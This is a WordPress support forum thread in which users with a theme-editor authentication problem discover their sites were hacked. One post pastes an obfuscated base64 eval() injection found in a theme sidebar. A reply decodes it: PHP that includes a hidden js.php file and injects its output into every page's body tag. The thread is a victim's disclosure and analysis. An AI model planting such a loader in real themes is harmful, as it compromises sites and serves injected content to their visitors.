Editing Theme - keeps asking me to authenticate but does nothing? (7 posts)

  1. gizmodvd
    Posted 7 years ago #

    Here's an odd one -

    We have decided to do a new site. Problem is, I am trying to update the code (Edit Theme) and when I do, and click 'Update File', it asks me to Authenticate. I do so, and it never updates the main page. I try again - same thing! What am I doing wrong? :

  2. Josh Leuze
    Posted 7 years ago #

    Are you using the built in Theme Editor? If so, make sure you have permissions of those theme files set correctly.

  3. Chadimoglou
    Posted 7 years ago #

    gizmodvd : I am having the same issue. Have you tried anything yet?

    So far I've recovered all of my files from last week (the hack occured yesterday during the day). This seemed to work but about an hour later the problem recurred.

    My website is currently hosted on a godaddy shared server. Could it be possible that the hack has spread to the entire server?


  4. degmsb
    Posted 7 years ago #

    I am having the same issue with bluehost.

    I noticed the below in my sidebar and I am sure I did not put it there:

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZTMvYW5zd2VydW4vcHVibGljX2h0bWwvdGVzdGluZy0yL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL3NraW5zL2RlZmF1bHQvaW1nL2pzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lMy9hbnN3ZXJ1bi9wdWJsaWNfaHRtbC90ZXN0aW5nLTIvd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvZGVmYXVsdC9pbWcvanMucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

  5. Josh Leuze
    Posted 7 years ago #

    degmsb, I'm pretty sure you have been hacked if you found that code in your theme!

  6. jdsangster
    Posted 6 years ago #

    I recently found similar code in my theme that I don't remember putting there and I have the same authentication issue..

    Hacked? Please explain.

  7. Peter Boosten
    Posted 6 years ago #

    The above base64 encrypted string decodes to:

    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home3/answerun/public_html/testing-2/wp-includes/js/tinymce/themes/advanced/skins/default/img/js.php')){include_once('/home3/answerun/public_html/testing-2/wp-includes/js/tinymce/themes/advanced/skins/default/img/js.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

    which, if I 'decode' correctly, tries to find a specific java script file in a specific directory (which is too specific IMHO) and tries to run a function. The chance that this js file is found in the mention location is a million to one, unless it has been custom prepared for degmsb's setup.


Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.